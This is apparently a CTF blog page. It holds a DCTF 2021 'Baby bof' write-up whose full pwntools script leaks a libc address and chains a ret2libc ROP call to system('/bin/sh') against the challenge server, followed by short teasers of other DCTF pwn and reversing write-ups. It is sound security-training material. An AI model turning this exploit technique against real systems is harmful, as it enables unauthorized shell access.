DCTF 2021 - Baby bof

Buffer overflow and ret2libc

Description

It's just another bof.

nc dctf-chall-baby-bof.westeurope.azurecontainer.io 7481

Preface

We got a simple binary with output plz don't rop me and after our input plz don't rop me Also we got a Dockerfile, which showed us the used image was Ubuntu:20.04

Overview

Based on the output, we know it was a rop challenge. Also checksec baby_bof gave us.

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

Loading the binary into ghidra I can calculate the offset of the return address.

So I knew, that after writing 18 characters I could overwrite the return address and control the code flow.

First I tried if I could do a rop only with the binary, but neither Ropper nor RopGadget found enough gadgets. So I had to use libc. For this I first needed to get the address where libc was loaded.

In order for this I leaked the address of got.fgets. If I then substract the address of fgets in libc, I could get the base address of libc. After the leak I would rerun the vulnerable function to make our next input.

Then I could use system and /bin/sh from libc to get a shell.

But somehow this did work on my local machine and not remote. Because I didn't see my error, I gave up and continued with other challenges. Short before the end, I wanted to finish this challenge, so I gave it another try.

I thought, that maybe my local system had a different libc. So I downloaded the root from Github. From their I could extract the libc and loading them side by side showed me the offsets were wrong.

But even with this change it didn't work. Because I thought it could still be some error with the offset, I tried to print /bin/sh with puts. The printout was correctly and I successfully had a shell.

From their I could cat the flag and the challenge was solved.

I didn't understanding why it worked. Testing some bits showed, that their was some call needed before the system or it woudln't work. I modified my script, to just include a ret-Gadget and my final exploit code was.

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.kernel = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"

context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './baby_bof'

elf = ELF(vulnerable)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc2 = ELF('./libc.so.6')


#p = elf.process()#
p = remote("dctf-chall-baby-bof.westeurope.azurecontainer.io", 7481)

p.readuntil('plz don\'t rop me')

fgets_got = elf.symbols['got.fgets']
fgets_libc = libc2.symbols['fgets']
system_libc = libc2.symbols['system']
sh_libc= next(libc2.search(b'/bin/sh'))
ret = next(elf.search(asm('ret')))

rop = ROP(elf)
rop.puts(fgets_got)
rop.call(elf.symbols['vuln'])

p.sendline(b'\x41'*18 + bytes(rop))

p.recvuntil("i don't think this will work\n")

fgets_address = p.recvuntil("\n")[:-1]
fgets_address = u64(fgets_address + b'\x00'*(8-len(fgets_address)))
libc_address = (fgets_address - fgets_libc)
system_address = system_libc + libc_address
sh_address = sh_libc + libc_address
elf.symbols['system'] = system_address

p.readuntil('plz don\'t rop me')

rop = ROP(elf)
rop.system(sh_address)

p.sendline(b'\x41'*18 + p64(ret) + bytes(rop))

p.recvuntil("i don't think this will work\n")

p.interactive()

The flag was located in a file called flag.txt.

dctf{D0_y0U_H4v3_A_T3mpl4t3_f0R_tH3s3}


DCTF 2021 - Just In Time

Using frida to get decrypted flag.

Description Don't fall in (rabbit) holes Preface We get a binary which just prints Decryption finished. Overview Using ghidra, we can analyse the binary. Inside the main of the binary we can see, that their is some binary content and multiple functions called with strncpy in between. undefined8 main(int argc,char **argv) { char *key_text; char *key_buffer; long Read More


DCTF 2021 - Bell

Read number and run throught known function

Description Blaise's friends like triangles too! nc dctf-chall-bell.westeurope.azurecontainer.io 5311 Preface The function gives us a number and then waits for multiple inputs. Overview Loading the file into ghidra we can take a look at what happens. undefined8 main(void) { int iVar1; uint uVar2; time_t tVar3; tVar3 = time((time_t *)0x0); srand((uint Read More


DCTF 2021 - Pwn sanity check

Simple buffer overflow with ret2win.

Description This should take about 1337 seconds to solve. nc dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io 7480 Preface We get a simple binary, with simple input and output. Overview Looking at the binary in ghidra, I found these functions. void vuln(void) { char local_48 [60]; int local_c; puts("tell me a joke"); fgets(local_48,0x100,stdin); if ( Read More


DCTF 2021 - Readme

Format String to dump the memory and get flag.

Description Read me to get the flag. nc dctf-chall-readme.westeurope.azurecontainer.io 7481 Preface We get a binary which asks for our name and then prints hello + input. But in order for the binary to run, a file flag.txt needs to be created in the working directoy. Overview Decompiling the binary in ghidra, we see a function vuln where the logic happens. The decompiled function with some renaming of the variables looks like this: void vuln(void) { Read More


DCTF 2021 - Hotel rop

ROP chain with multiple function and then ret2win

Description They say programmers' dream is California. And because they need somewhere to stay, we've built a hotel! nc dctf1-chall-hotel-rop.westeurope.azurecontainer.io 7480 Preface We got a binary file with simple input and some output related to hotel checkIn. Overview Based on the name of the challenge, we can be certain, that some sort of rop is needed. Loading the binary into ghidra we can see our function vuln. void vuln(void) { char local_28 [ Read More


DCTF 2021 - Pinch me

Buffer overflow to overwrite variable

Description This should be easy! nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480 Preface We got a binary file which asked us Am I dreaming? and with basic input prints then Pinch me! Overview Loading the binary into ghidra we can see, that the interaction happens in the function vuln void vuln(void) { char local_28 [24]; int local_10; int local_c; local_c = 0x1234567 Read More


Navigation